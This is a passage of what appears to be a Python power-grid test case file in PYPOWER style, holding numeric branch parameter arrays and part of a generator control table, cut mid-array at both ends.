0.0007079293628808865, 0.025412930201351602, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 4.0889999999999995 ], [110, 472, 0, 0.00019511772853185596, 0.0070042485539216805, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 1.127 ], [251, 472, 0, 4.207063711911357e-05, 0.00151023282928764, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.243 ], [226, 474, 0, 0.017639669421487602, 0.011663231841509601, 248.0, 248.0, 248.0, 0, 1, 1, -360, 13.34 ], [473, 474, 0, 0.003467107438016529, 0.00916971330986216, 495.0, 495.0, 495.0, 0, 2, 1, -360, 5.244 ], [257, 474, 0, 0.020264462809917356, 0.053594910935781594, 495.0, 495.0, 495.0, 0, 2, 1, -360, 30.65 ], [6, 474, 0, 0.08066247933884299, 0.05333349367016, 248.0, 248.0, 248.0, 0, 1, 1, -360, 61.001000000000005 ], [299, 475, 0, 0.013238227146814403, 0.47521993028123993, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 76.464 ], [3, 475, 0, 0.0002794321329639889, 0.010030929162389441, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 1.614 ], [210, 475, 0, 0.0001481994459833795, 0.00531999712702368, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.856 ], [297, 476, 0, 0.0193500826446281, 0.05117658265464801, 495.0, 495.0, 495.0, 0, 1, 1, -360, 29.267 ], [296, 476, 0, 0.005596694214876033, 0.014801987636898, 495.0, 495.0, 495.0, 0, 1, 1, -360, 8.465 ], [295, 476, 0, 0.0009474380165289256, 0.00250575880492432, 495.0, 495.0, 495.0, 0, 1, 1, -360, 1.433 ], [313, 478, 0, 0.008696849030470914, 0.31219557906752804, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 50.233000000000004 ], [477, 478, 0, 1.5235457063711912e-05, 0.0005469155924977479, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 0.08800000000000001 ], [245, 478, 0, 0.005264542936288089, 0.188984197007248, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 30.408 ], [479, 481, 0, 0.028420495867768597, 0.07516576970575199, 495.0, 495.0, 495.0, 0, 1, 1, -360, 42.986000000000004 ], [565, 481, 0, 0.024842314049586776, 0.065702289836964, 495.0, 495.0, 495.0, 0, 1, 1, -360, 37.574 ], [480, 481, 0, 7.735537190082645e-05, 0.000204587425105844, 495.0, 495.0, 495.0, 0, 1, 1, -360, 0.11699999999999999 ], [415, 482, 0, 0.011021814404432133, 0.0989140353680364, 856.0, 856.0, 856.0, 0, 1, 1, -360, 31.831 ], [56, 482, 0, 0.002630886426592798, 0.0236105947261788, 856.0, 856.0, 856.0, 0, 1, 1, -360, 7.598 ], [409, 482, 0, 0.0007635041551246537, 0.0068519822810072005, 856.0, 856.0, 856.0, 0, 1, 1, -360, 2.205 ], [483, 484, 0, 9.037396121883656e-05, 0.000811050963873968, 856.0, 856.0, 856.0, 0, 1, 1, -360, 0.261 ], [3, 484, 0, 0.010022160664819944, 0.08994275516621358, 856.0, 856.0, 856.0, 0, 1, 1, -360, 28.944000000000003 ], [301, 484, 0, 0.00966516620498615, 0.08673894848517479, 856.0, 856.0, 856.0, 0, 1, 1, -360, 27.913 ], [233, 485, 0, 0.01410180055401662, 0.1265550251138996, 856.0, 856.0, 856.0, 0, 1, 1, -360, 40.726 ], [392, 485, 0, 0.00914819944598338, 0.0820994883738036, 856.0, 856.0, 856.0, 0, 1, 1, -360, 26.42 ], [391, 485, 0, 8.518005540166207e-05, 0.000764438839512864, 856.0, 856.0, 856.0, 0, 1, 1, -360, 0.24600000000000002 ], [579, 488, 0, 0.004636473829194215, 0.11036180126571601, 1486.0, 1486.0, 1486.0, 0, 1, 1, -360, 21.038 ], [486, 488, 0, 0.00016969696969690082, 0.00403929018798184, 1486.0, 1486.0, 1486.0, 0, 1, 1, -360, 0.77 ], [487, 488, 0, 0.00014567493112954544, 0.00346749456396992, 1486.0, 1486.0, 1486.0, 0, 1, 1, -360, 0.6609999999999999 ], [270, 489, 0, 0.0001745152354570637, 0.0062646695140596, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 1.008 ], [331, 489, 0, 0.003002943213296399, 0.10779830627119119, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 17.345 ], [396, 489, 0, 0.01124792243767313, 0.40377286606072005, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 64.968 ], [519, 253, 0, 0.013353485337561985, 0.141267767926912, 991.0, 991.0, 991.0, 0, 1, 1, -360, 40.394293146100004 ], [382, 349, 0, 0.009091647380263157, 1.30547149138788, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 105.02671053600001 ], [349, 351, 0, 0.0005858117819605263, 0.0841168325920224, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 6.76729770521 ], [459, 465, 0, 1.578788789911157e-05, 0.00016702153987596, 991.0, 991.0, 991.0, 0, 1, 1, -360, 0.047758360894800005 ], [549, 550, 0, 3.680432518409091e-05, 0.000389356391787088, 991.0, 991.0, 991.0, 0, 1, 1, -360, 0.111333083682 ], [550, 551, 0, 5.755645674710744e-05, 0.0006088951287918401, 991.0, 991.0, 991.0, 0, 1, 1, -360, 0.17410828165999997 ], [194, 195, 0, 1.7560672583171745e-05, 0.00252154053805592, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.202860889681 ], [247, 248, 0, 2.1755213937811637e-05, 0.0031238355819477198, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.25131623141 ], [2, 294, 0, 2.3531392658518004e-05, 0.003378877444715, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.271834647991 ], [549, 551, 0, 9.265809538429751e-05, 0.0009802386406577602, 991.0, 991.0, 991.0, 0, 1, 1, -360, 0.28029073853799996 ], [54, 365, 0, 2.573045189134349e-05, 0.00369464080598484, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.297238180249 ], [131, 265, 0, 2.7616389041343487e-05, 0.00396544290388756, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.319024526206 ], [91, 92, 0, 2.8945628197853184e-05, 0.0041563086239824396, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.33437989694200004 ], [247, 249, 0, 3.098840072160664e-05, 0.00444963074500788, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.357978005136 ], [186, 191, 0, 3.1591661821191135e-05, 0.00453625312865552, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.36494687735799997 ], [129, 173, 0, 3.202671277479225e-05, 0.00459872218332188, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.369972585975 ], [96, 202, 0, 3.5971247867797784e-05, 0.00516511877739804, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.415539855369 ], [53, 320, 0, 3.784209581142659e-05, 0.00543375421308236, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.437151890814 ], [24, 396, 0, 4.144748602818559e-05, 0.005951452925597279, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.47880135859800005 ], [133, 156, 0, 4.431754564044322e-05, 0.0063635653674415605, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.511956287238 ], [442, 452, 0, 4.483572190450138e-05, 0.006437970402313801, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.517942259441 ], [445, 452, 0, 4.490753296371191e-05, 0.0064482817668697215, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.518771820797 ], [247, 250, 0, 4.594910768732687e-05, 0.00659784169268824, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.530804092004 ], [187, 195, 0, 4.755760376239612e-05, 0.006828805970367921, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.549385438663 ], [216, 236, 0, 5.03353075283241e-05, 0.00722765701751724, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.581473472567 ], [244, 389, 0, 5.1633313019736845e-05, 0.007414037889302401, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.596468032004 ], [394, 406, 0, 5.6346419007686985e-05, 0.008090793734075721, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.650913832377 ], [442, 445, 0, 6.388070648310249e-05, 0.00917264360085512, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.737949921293 ], [442, 444, 0, 6.584378362735456e-05, 0.00945452224616264, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.760627388463 ], [198, 472, 0, 8.37554210498615e-05, 0.0120264578966664, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.967542623967 ], [464, 467, 0, 8.460287496468144e-05, 0.01214814397621276, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 0.977332411594 ], [198, 251, 0, 8.83613182396122e-05, 0.012687819608389479, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 1.0207499483 ], [112, 143, 0, 9.049653833033241e-05, 0.012994416294241841, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 1.04541601079 ], [2, 490, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [5, 491, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [10, 492, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [12, 493, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [13, 494, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [15, 495, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [18, 496, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [20, 497, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [22, 498, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [24, 499, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [26, 500, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [30, 501, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [32, 502, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [37, 503, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [42, 504, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [46, 505, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [52, 506, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [56, 507, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [61, 508, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [68, 509, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [69, 510, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [74, 511, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [78, 512, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [86, 513, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [87, 514, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [94, 515, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [95, 516, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [96, 517, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [99, 518, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [100, 519, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [104, 520, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [105, 521, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [106, 522, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [107, 523, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [117, 524, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [120, 525, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [123, 526, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [124, 527, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [125, 528, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [128, 529, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [129, 530, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [138, 531, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [143, 532, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [156, 533, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [157, 534, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [159, 535, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [160, 536, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [165, 537, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [184, 538, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [191, 539, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [195, 540, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [201, 541, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [220, 542, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [231, 543, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [232, 544, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [233, 545, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [236, 546, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [245, 547, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [246, 548, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [248, 549, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [249, 550, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [250, 551, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [259, 552, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [261, 553, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [262, 554, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [265, 555, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [270, 556, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [277, 557, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [279, 558, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [280, 559, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [290, 560, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [301, 561, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [305, 562, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [306, 563, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [310, 564, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [313, 565, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [315, 566, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [320, 567, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [330, 568, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [332, 569, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [334, 570, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [336, 571, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [349, 572, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [351, 573, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [358, 574, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [360, 575, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [380, 576, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [382, 577, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [383, 578, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [389, 579, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [401, 580, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [402, 581, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [409, 582, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [415, 583, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [444, 584, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ], [452, 585, 0, 0.005, 0.0, 2000.0, 2000.0, 2000.0, 1.0, 0, 1, -360, 360 ] ]) ppc["gen_control"] = array([ [586, 1, 0.08658028904199107, 4.329014452099554, 0, 0, 0], [589, 1, 0.010042676909098597, 0.5021338454549299, 0, 0, 0], [590, 1, 0.012095775674984046, 0.6047887837492023, 0, 0, 0], [593, 1, 0.0017666198683200384, 0.08833099341600192, 0, 0, 0], [595, 1, 1.50560576164933, 75.2802880824665, 0, 0, 0], [598, 1, 0.0038197186342054878, 0.1909859317102744, 0, 0, 0], [599, 1, 0.0029602819415092537, 0.1480140970754627, 0, 0, 0], [601, 1, 0.019576058000303126, 0.9788029000151565, 0, 0, 0], [602, 1, 0.007830423200121252, 0.39152116000606263, 0, 0, 0], [603, 1, 1.0997606567649967, 54.98803283824984, 0, 0, 0], [607, 1, 0.5729577951308232, 28.64788975654116, 0, 0, 0], [608, 1, 0.0076394372684109755, 0.3819718634205488, 0, 0, 0], [609, 1, 0.0057932399285449895, 0.2896619964272495, 0, 0, 0], [612, 1, 0.00954929658551372, 0.477464829275686, 0, 0, 0], [614, 1, 0.00954929658551372, 0.477464829275686, 0, 0, 0], [616, 1, 0.0046154933496649645, 0.23077466748324824, 0, 0, 0], [617, 1, 0.04360845440717932, 2.1804227203589663, 0, 0, 0], [618, 1, 0.010631550198538607, 0.5315775099269304, 0, 0, 0], [619, 1, 0.037560566569687294, 1.8780283284843649, 0, 0, 0], [624, 1, 0.004297183463481174, 0.21485917317405873, 0, 0, 0], [629, 1, 0.023968734429639437, 1.198436721481972, 0, 0, 0], [632, 1, 0.01435577586688896, 0.717788793344448, 0, 0, 0], [637, 1, 0.017093240888069558, 0.854662044403478, 0, 0, 0], [638, 1, 0.02048324117592693, 1.0241620587963465, 0, 0, 0], [640, 1, 0.0038197186342054878, 0.1909859317102744, 0, 0, 0], [641, 1, 0.0040107045659157625, 0.20053522829578813, 0, 0, 0], [642, 1, 0.00919915571071155, 0.4599577855355775, 0, 0, 0], [643, 1, 0.27279157245950864, 13.639578622975431, 0, 0, 0], [647, 1, 0.00445633840657307, 0.2228169203286535, 0, 0, 0], [652, 1, 0.00746436683100989, 0.37321834155049455, 0, 0, 0], [655, 1, 0.019576058000303126, 0.9788029000151565, 0, 0, 0], [661, 1, 0.010408733278209955, 0.5204366639104978, 0, 0, 0], [663, 1, 0.00238732414637843, 0.1193662073189215, 0, 0, 0], [666, 1, 0.00919915571071155, 0.4599577855355775, 0, 0, 0], [668, 1, 0.24382537281678363, 12.191268640839182, 0, 0, 0], [670, 1, 0.0076394372684109755, 0.3819718634205488, 0, 0, 0], [672, 1, 0.010536057232683471, 0.5268028616341736, 0, 0, 0], [681, 1, 0.0063821132179850025, 0.31910566089925013, 0, 0, 0], [683, 1, 0.008753521870054244, 0.4376760935027122, 0, 0, 0], [687, 1, 0.42303383873825773, 21.151691936912886, 0, 0, 0], [694, 1, 0.005220282133414166, 0.2610141066707083, 0, 0, 0], [695, 1, 0.004679155326901723, 0.23395776634508614, 0, 0, 0], [696, 1, 0.22950142793851305, 11.475071396925653, 0, 0, 0], [697, 1, 0.0036923946797319715, 0.1846197339865986, 0, 0, 0], [698, 1, 0.0038197186342054878, 0.1909859317102744, 0, 0, 0], [702, 1, 0.023363945645890238, 1.168197282294512, 0, 0, 0], [704, 1, 0.16170142218136566, 8.085071109068283, 0, 0, 0], [705, 1, 0.005411268065124442, 0.27056340325622213, 0, 0, 0], [707, 1, 0.010822536130248884, 0.5411268065124443, 0, 0, 0], [713, 1, 0.004265352474862795, 0.21326762374313976, 0, 0, 0], [714, 1, 0.00477464829275686, 0.238732414637843, 0, 0, 0], [716, 1, 1.5915494309189534e-05, 0.0007957747154594768, 0, 0, 0], [717, 1, 0.0017507043740108488, 0.08753521870054244, 0, 0, 0], [719, 1, 0.623250757147862, 31.162537857393104, 0, 0, 0], [724, 1, 0.0019257748114119334, 0.09628874057059668, 0, 0, 0], [730, 1, 0.10077690996578814, 5.038845498289407, 0, 0, 0], [732, 1, 0.004647324338283344, 0.2323662169141672, 0, 0, 0], [735, 1, 0.013496339174192726, 0.6748169587096363, 0, 0, 0], [738, 1, 0.04408591923645501, 2.2042959618227504, 0, 0, 0], [741, 1, 0.0340591578216656, 1.7029578910832803, 0, 0, 0], [742, 1, 0.0028647889756541157, 0.14323944878270578, 0, 0, 0], [743, 1, 0.44881693951914486, 22.440846975957243, 0, 0, 0], [747, 1, 0.0039788735772973835, 0.1989436788648692, 0, 0, 0], [748, 1, 0.03501408748021698, 1.7507043740108488, 0, 0, 0], [749, 1, 0.0025464790894703256, 0.12732395447351627, 0, 0, 0], [750, 1, 0.028902537665488188, 1.4451268832744095, 0, 0, 0], [753, 1, 0.049624511256052974, 2.4812255628026487, 0, 0, 0], [758, 1, 0.0058887328944001276, 0.2944366447200064, 0, 0, 0], [761, 1, 0.004997465213085514, 0.2498732606542757, 0, 0, 0], [762, 1, 0.3517324242330887, 17.586621211654435, 0, 0, 0], [763, 1, 0.006461690689530951, 0.32308453447654756, 0, 0, 0], [765, 1, 0.018780283284843647, 0.9390141642421824, 0, 0, 0], [767, 1, 0.0035650707252584553, 0.17825353626292276, 0, 0, 0], [769, 1, 0.013782818071758136, 0.6891409035879068, 0, 0, 0], [771, 1, 0.21963382146681557, 10.981691073340778, 0, 0, 0], [772, 1, 0.002992112930127632, 0.1496056465063816, 0, 0, 0], [774, 1, 0.010663381187156987, 0.5331690593578494, 0, 0, 0], [777, 1, 0.012573240504259732, 0.6286620252129866, 0, 0, 0], [778, 1, 0.004679155326901723, 0.23395776634508614, 0, 0, 0], [781, 1, 0.4169859509007658, 20.84929754503829, 0, 0, 0], [784, 1, 0.4058451048843331, 20.292255244216655, 0, 0, 0], [785, 1, 0.00047746482927568597, 0.0238732414637843, 0, 0, 0], [787, 1, 0.24764509145098912, 12.382254572549456, 0, 0, 0], [788, 1, 0.2785211504108168, 13.926057520540843, 0, 0, 0], [789, 1, 0.0123185925953127, 0.615929629765635, 0, 0, 0], [791, 1, 0.0031830988618379067, 0.15915494309189535, 0, 0, 0], [792, 1, 0.009979014931861837, 0.49895074659309185, 0, 0, 0], [795, 1, 0.004329014452099553, 0.2164507226049777, 0, 0, 0], [800, 1, 0.0058091554228541795, 0.290457771142709, 0, 0, 0], [801, 1, 0.007957747154594767, 0.3978873577297384, 0, 0, 0], [802, 1, 0.07957747154594767, 3.9788735772973833, 0, 0, 0], [805, 1, 0.44881693951914486, 22.440846975957243, 0, 0, 0], [806, 1, 0.005697746962689853, 0.2848873481344927, 0, 0, 0], [808, 1, 0.034616200122487235, 1.7308100061243619, 0, 0, 0], [809, 1, 0.0039788735772973835, 0.1989436788648692, 0, 0, 0], [811, 1, 0.0040107045659157625, 0.20053522829578813, 0, 0, 0], [814, 1, 0.014164789935178685, 0.7082394967589343, 0, 0, 0], [816, 1, 0.012748310941660816, 0.6374155470830408, 0, 0, 0], [817, 1, 0.017188733853924696, 0.8594366926962349, 0, 0, 0], [821, 1, 0.013130282805081364, 0.6565141402540683, 0, 0, 0], [822, 1, 0.04265352474862795, 2.1326762374313977, 0, 0, 0], [826, 1, 0.018461973398659858, 0.9230986699329929, 0, 0, 0], [830, 1, 0.02832957987035737, 1.4164789935178685, 0, 0, 0], [835, 1, 0.010138169874953733, 0.5069084937476867, 0, 0, 0], [836, 1, 0.008116902097686661, 0.4058451048843331, 0, 0, 0], [837, 1, 0.15024226627874918, 7.512113313937459, 0, 0, 0], [839, 1, 0.011666057328635928, 0.5833028664317964, 0, 0, 0], [841, 1, 0.0037083101740411615, 0.18541550870205808, 0, 0, 0], [844, 1, 0.012732395447351627, 0.6366197723675814, 0, 0, 0], [845, 1, 0.10122254380644544, 5.061127190322272, 0, 0, 0], [849, 1, 0.24796340133717296, 12.398170066858649, 0, 0, 0], [850, 1, 0.005092958178940651, 0.25464790894703254, 0, 0, 0], [851, 1, 0.01265281797580568, 0.632640898790284, 0, 0, 0], [853, 1, 0.0036923946797319715, 0.1846197339865986, 0, 0, 0], [855, 1, 0.21899720169444797, 10.949860084722399, 0, 0, 0], [856, 1, 0.011459155902616463, 0.5729577951308231, 0, 0, 0], [857, 1, 0.4462704604296745, 22.313523021483725, 0, 0, 0], [858, 1, 0.01808000153523931, 0.9040000767619655, 0, 0, 0], [860, 1, 0.0039788735772973835, 0.1989436788648692, 0, 0, 0], [865, 1, 0.0035014087480216977, 0.17507043740108488, 0, 0, 0], [867, 1, 0.24478030247533505, 12.239015123766753, 0, 0, 0], [869, 1, 0.4329014452099553, 21.645072260497766, 0, 0, 0], [870, 1, 0.018589297353133374, 0.9294648676566688, 0, 0, 0], [872, 1, 0.00716197243913529, 0.3580986219567645, 0, 0, 0], [874, 1, 0.006589014644004467, 0.3294507322002233, 0, 0, 0], [875, 1, 0.007766761222884492, 0.38833806114422464, 0, 0, 0], [882, 1, 0.005538592019597957, 0.2769296009798979, 0, 0, 0], [883, 1, 0.005729577951308231, 0.28647889756541156, 0, 0, 0], [885, 1, 0.15597184423005742, 7.798592211502871, 0, 0, 0], [886, 1, 0.8186930272647096, 40.93465136323548, 0, 0, 0], [889, 1, 0.0030239439187460114, 0.15119719593730058, 0, 0, 0], [890, 1, 0.0076394372684109755, 0.3819718634205488, 0, 0, 0], [893, 1, 0.00954929658551372, 0.477464829275686, 0, 0, 0], [894, 1, 0.025146481008519465, 1.2573240504259733, 0, 0, 0], [895, 1, 0.0030239439187460114, 0.15119719593730058, 0, 0, 0], [896, 1, 0.0038197186342054878, 0.1909859317102744, 0, 0, 0], [898, 1, 0.013464508185574344, 0.6732254092787172, 0, 0, 0], [900, 1, 0.03584169318429482, 1.7920846592147412, 0, 0, 0], [902, 1, 0.006207042780583919, 0.31035213902919595, 0, 0, 0], [903, 1, 0.0031990143561470966, 0.15995071780735484, 0, 0, 0], [905, 1, 0.021851973686517232, 1.0925986843258617, 0, 0, 0], [906, 1, 0.010504226244065093, 0.5252113122032547, 0, 0, 0], [907, 1, 0.02142225534016911, 1.0711127670084555, 0, 0, 0], [909, 1, 0.005856901905781748, 